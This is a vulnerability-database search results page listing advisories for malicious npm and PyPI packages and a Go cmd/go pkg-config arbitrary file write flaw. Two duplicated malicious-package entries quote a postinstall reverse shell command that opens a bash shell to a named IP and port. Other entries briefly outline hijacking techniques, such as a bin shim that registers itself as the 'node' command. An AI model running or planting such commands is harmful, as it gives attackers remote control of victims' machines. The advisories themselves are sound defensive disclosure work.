Lucene search
K

270 matches found

OSV
OSV
added 2026/06/25 6:39 a.m.6 views

MAL-2026-6443 Malicious code in agentsync-pkg (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector b383c760dffae4a26d7f94b433bbe00dedb2426b23f4713610d6f5f36c594cf1 On every import / require'agentsync-pkg', src/index.js line 152 resolves bin/native/parser.node and calls require on it: const p =...

6AI score
Exploits0References3
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/24 6:16 a.m.11 views

Malicious code in evil-pkg (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 9fafd2d99f9cf4494726ad31b7444c029e6af96702066992ae4b0741c5239b1a Package declares "bin": "node": "./shim.js" in package.json, which registers shim.js as the node command in nodemodules/.bin. In any environment wher...

6.2AI score
Exploits0References6
AstraLinux
AstraLinux
added 2026/06/19 11:10 a.m.13 views

Astra Linux – Vulnerability in Golang-1.19, Golang-1.23

Creating a malicious file using cmd/go can result in writing to a file controlled by an attacker, with partial control over the file’s content. The cgo pkg-config: directive in a Go source file provides command-line arguments that are passed to the Go pkg-config command. An attacker can provide a...

8.6CVSS7.1AI score0.00532EPSS
Exploits0References2
OSV
OSV
added 2026/06/01 8:30 p.m.17 views

MAL-2026-5132 Malicious code in rookie-security-test-pkg (npm)

--- -= Per source details. Do not edit below this line.=- Source: ossf-package-analysis 1af47f1485c4c5bd3c6ee3cb7330781c1892ebc8bea1c59b0a0045c49ab8c93d The OpenSSF Package Analysis project identified 'rookie-security-test-pkg' @ 1.0.0 npm as malicious. It is considered malicious because: - The...

5.8AI score
Exploits0
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/01 8:30 p.m.16 views

Malicious code in rookie-security-test-pkg (npm)

--- -= Per source details. Do not edit below this line.=- Source: ossf-package-analysis 1af47f1485c4c5bd3c6ee3cb7330781c1892ebc8bea1c59b0a0045c49ab8c93d The OpenSSF Package Analysis project identified 'rookie-security-test-pkg' @ 1.0.0 npm as malicious. It is considered malicious because: - The...

5.8AI score
Exploits0
AstraLinux
AstraLinux
added 2026/05/20 5:53 a.m.8 views

Astra Linux – Vulnerability in edk2

Insufficient input validation in MdeModulePkg in EDKII may allow an unauthenticated user to potentially enable escalation of privileges, denial of service, and/or information disclosure through physical access...

6.8CVSS6.3AI score0.00345EPSS
Exploits0References2
OSV
OSV
added 2026/05/13 1:8 p.m.9 views

MAL-2026-3714 Malicious code in hello-world-pkg-value-value-p (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector d768990007f2926e3a58020102d277c3a604c6aa3bc70056cd466bc24437fc89 This package's postinstall hook executes node index.js, which runs execSync'bash -i & /dev/tcp/52.249.218.132/8080 0&1' — an interactive bash reverse...

5.8AI score
Exploits0References1
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/05/13 1:8 p.m.10 views

Malicious code in hello-world-pkg-value-value-p (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector d768990007f2926e3a58020102d277c3a604c6aa3bc70056cd466bc24437fc89 This package's postinstall hook executes node index.js, which runs execSync'bash -i & /dev/tcp/52.249.218.132/8080 0&1' — an interactive bash reverse...

5.8AI score
Exploits0References1
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/04/23 6:36 p.m.9 views

Malicious code in test-pkg-jie (PyPI)

--- -= Per source details. Do not edit below this line.=- Source: kam193 bc409f90d96c576263a60bd95ab30260b973097425292cdd53999e49cb3c4011 During installation, the package attempts to create a reverse shell --- Category: MALICIOUS - The campaign has clearly malicious intent, like infostealers...

6AI score
Exploits0References1
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/04/16 9:42 a.m.13 views

Malicious code in @youcanneverguessthisonereally/test-pkg (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector aee30c3c314a7edd599cfa020d43c4fdc7dec927af6e0af8a7772a3b25d8b63c The package @youcanneverguessthisonereally/test-pkg was found to contain malicious code...

5.7AI score
Exploits0
RedHat Linux
RedHat Linux
added 2026/04/13 5:44 p.m.3 views

cmd/go: cmd/go: Arbitrary file write via malicious pkg-config directive

A flaw was found in cmd/go. An attacker can exploit this by building a malicious Go source file that uses the 'cgo pkg-config:' directive. This allows the attacker to write to an arbitrary file with partial control over its content, by providing a '--log-file' argument to the pkg-config command...

8.6CVSS5.9AI score0.00532EPSS
Exploits0References8
RedHat Linux
RedHat Linux
added 2026/04/13 4:34 p.m.6 views

cmd/go: cmd/go: Arbitrary file write via malicious pkg-config directive

A flaw was found in cmd/go. An attacker can exploit this by building a malicious Go source file that uses the 'cgo pkg-config:' directive. This allows the attacker to write to an arbitrary file with partial control over its content, by providing a '--log-file' argument to the pkg-config command...

8.6CVSS5.9AI score0.00532EPSS
Exploits0References8
RedHat Linux
RedHat Linux
added 2026/04/13 4:31 p.m.2 views

cmd/go: cmd/go: Arbitrary file write via malicious pkg-config directive

A flaw was found in cmd/go. An attacker can exploit this by building a malicious Go source file that uses the 'cgo pkg-config:' directive. This allows the attacker to write to an arbitrary file with partial control over its content, by providing a '--log-file' argument to the pkg-config command...

8.6CVSS5.9AI score0.00532EPSS
Exploits0References8
RedHat Linux
RedHat Linux
added 2026/04/13 4:26 p.m.3 views

cmd/go: cmd/go: Arbitrary file write via malicious pkg-config directive

A flaw was found in cmd/go. An attacker can exploit this by building a malicious Go source file that uses the 'cgo pkg-config:' directive. This allows the attacker to write to an arbitrary file with partial control over its content, by providing a '--log-file' argument to the pkg-config command...

8.6CVSS7.2AI score0.00532EPSS
Exploits0References8
RedHat Linux
RedHat Linux
added 2026/04/13 4:21 p.m.2 views

cmd/go: cmd/go: Arbitrary file write via malicious pkg-config directive

A flaw was found in cmd/go. An attacker can exploit this by building a malicious Go source file that uses the 'cgo pkg-config:' directive. This allows the attacker to write to an arbitrary file with partial control over its content, by providing a '--log-file' argument to the pkg-config command...

8.6CVSS7.2AI score0.00532EPSS
Exploits0References8
RedHat Linux
RedHat Linux
added 2026/04/13 10:25 a.m.3 views

cmd/go: cmd/go: Arbitrary file write via malicious pkg-config directive

A flaw was found in cmd/go. An attacker can exploit this by building a malicious Go source file that uses the 'cgo pkg-config:' directive. This allows the attacker to write to an arbitrary file with partial control over its content, by providing a '--log-file' argument to the pkg-config command...

8.6CVSS7.2AI score0.00532EPSS
Exploits0References8
Tenable Nessus
Tenable Nessus
added 2026/04/13 12:0 a.m.10 views

RHEL 8 : go-toolset:rhel8 (RHSA-2026:7879)

The remote Redhat Enterprise Linux 8 host has packages installed that are affected by multiple vulnerabilities as referenced in the RHSA-2026:7879 advisory. Go Toolset provides the Go programming language tools and libraries. Go is alternatively known as golang. Security Fixes: cmd/go: cmd/go:...

8.6CVSS7.1AI score0.00532EPSS
Exploits0References6
RedHat Linux
RedHat Linux
added 2026/04/10 2:24 p.m.3 views

cmd/go: cmd/go: Arbitrary file write via malicious pkg-config directive

A flaw was found in cmd/go. An attacker can exploit this by building a malicious Go source file that uses the 'cgo pkg-config:' directive. This allows the attacker to write to an arbitrary file with partial control over its content, by providing a '--log-file' argument to the pkg-config command...

8.6CVSS6.1AI score0.00532EPSS
Exploits0References8
OSV
OSV
added 2026/04/08 6:0 a.m.13 views

RLSA-2026:6949 Important: go-toolset:rhel8 security update

Go Toolset provides the Go programming language tools and libraries. Go is alternatively known as golang. Security Fixes: cmd/go: cmd/go: Arbitrary file write via malicious pkg-config directive CVE-2025-61731 net/url: Incorrect parsing of IPv6 host literals in net/url CVE-2026-25679 For more...

8.6CVSS7.1AI score0.00532EPSS
Exploits0References3
AlmaLinux
AlmaLinux
added 2026/04/08 12:0 a.m.13 views

Important: go-toolset:rhel8 security update

Go Toolset provides the Go programming language tools and libraries. Go is alternatively known as golang. Security Fixes: cmd/go: cmd/go: Arbitrary file write via malicious pkg-config directive CVE-2025-61731 net/url: Incorrect parsing of IPv6 host literals in net/url CVE-2026-25679 For more...

8.6CVSS5.8AI score0.00532EPSS
Exploits0References6
Rows per page
Query Builder